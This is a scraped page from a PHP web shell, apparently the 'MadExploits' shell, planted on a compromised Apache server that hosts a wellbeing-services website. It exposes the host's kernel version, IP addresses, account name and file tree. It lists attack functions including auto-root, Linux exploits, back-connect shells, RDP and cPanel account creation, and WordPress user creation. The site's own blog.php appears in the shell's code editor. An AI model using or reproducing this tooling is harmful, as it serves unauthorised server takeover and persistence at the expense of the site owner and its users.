Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.139.70.243
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
auswellbeing /
[ HOME SHELL ]
Name
Size
Permission
Action
auswellbeing
[ DIR ]
drwxr-xr-x
config.ini
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
old
[ DIR ]
drwxr-xr-x
about.php
3.54
KB
-rw-r--r--
adjustment_support.php
48
B
-rw-r--r--
blog.php
2.65
KB
-rw-r--r--
check.php
718
B
-rw-r--r--
counselling_for_carers.php
48
B
-rw-r--r--
create.php
7.88
KB
-rw-r--r--
delete.php
1.42
KB
-rw-r--r--
front.check.login.php
740
B
-rw-r--r--
index.php
9.44
KB
-rw-r--r--
mindfulness_practice.php
48
B
-rw-r--r--
multilingual.php
48
B
-rw-r--r--
personal_development.php
48
B
-rw-r--r--
post.php
3.53
KB
-rw-r--r--
process.php
3.47
KB
-rw-r--r--
process_new.php
3.14
KB
-rw-r--r--
process_seo.php
1
KB
-rw-r--r--
relationship_skills.php
48
B
-rw-r--r--
service-data-template.php
2.57
KB
-rw-r--r--
service-data.php
1.45
KB
-rw-r--r--
services.php
3.47
KB
-rw-r--r--
update.php
10.89
KB
-rw-r--r--
upload.image.php
540
B
-rw-r--r--
upload.image.sm.php
561
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : blog.php
<?php include( "includes/header.php");?> <section class="page_breadcrumbs ds background_cover section_padding_50"> <div class="container"> <div class="row"> <div class="col-sm-12 text-center"> <h2> Blog <?php if(isset($_SESSION['login'])){ ?> <a href="create.php?type=blog" class="btn btn-success btn-lg"> <i class="fa fa-plus"></i> Add Post </a> <?php }?> </h2> <ol class="breadcrumb divided_content wide_divider"> <li> <a href="index.php">Home</a> </li> <li class="active">Blog</li> </ol> </div> </div> </div> </section> <!-- blog sevices --> <section class="wht p-tb40"> <div class="container"> <div class="row"> <?php $posts = getData($db, bt); ?> <?php while($post = $posts->fetch_assoc()){ ?> <div class="col-lg-4 col-md-6 col-sm-12"> <div class="vertical-item content-padding with_border"> <div class="item-media text-center entry-thumbnail"> <?php if(isset($_SESSION['login'])){ ?> <a href="update.php?tb=<?=$tool->ed(bt, 'e') ?>&ref=blog&type=blog&id=<?php echo $post['id']; ?>" style="position: absolute;top: 19px;right: 20px;z-index:999;opacity: 0.9;" class="btn btn-warning btn-sm" title="Update This Post"> <i class="rt-icon2-pencil"></i> Edit Post </a> <a href="delete.php?type=blog&tbl=<?=$tool->ed(bt, 'e') ?>&id=<?php echo $post['id']; ?>&ref=blog" style="position: absolute;top: 19px;left: 20px;z-index:999;opacity: 0.9;" class="btn btn-danger btn-sm deleteServiceBtn" title="Delete This Post"> <i class="rt-icon2-trash"></i> Delete Post </a> <?php }?> <img src="<?=$post['post_img'] ?>" alt="<?=$post['post_title'] ?>"> </div> <div class="item-content entry-content"> <header class="entry-header"> <h3 class="entry-title"> <a href="post.php?post_id=<?=$post['id'] ?>" rel="bookmark"><?=$post['post_title'] ?></a> </h3> <span class="date small-text highlight" style="padding: 0;"> <time datetime="<?=$post['post_date'] ?>" class="entry-date" style="color:#ccc"> <i class="fa fa-clock-o"></i> <?=$tool->daysago($post['post_date']); ?> </time> </span> </header> <?=$post['post_short_summery'] ?> <p> <a href="post.php?post_id=<?=$post['id'] ?>" title="Read More" rel="bookmark">Read More <i class="fa fa-angle-double-right"></i></a> </p> </div> </div> </div> <?php } ?> </div> </div> </section> <?php include( "includes/subscribe.php");?> <!-- end section--> <?php include( "includes/footer.php");?>
Close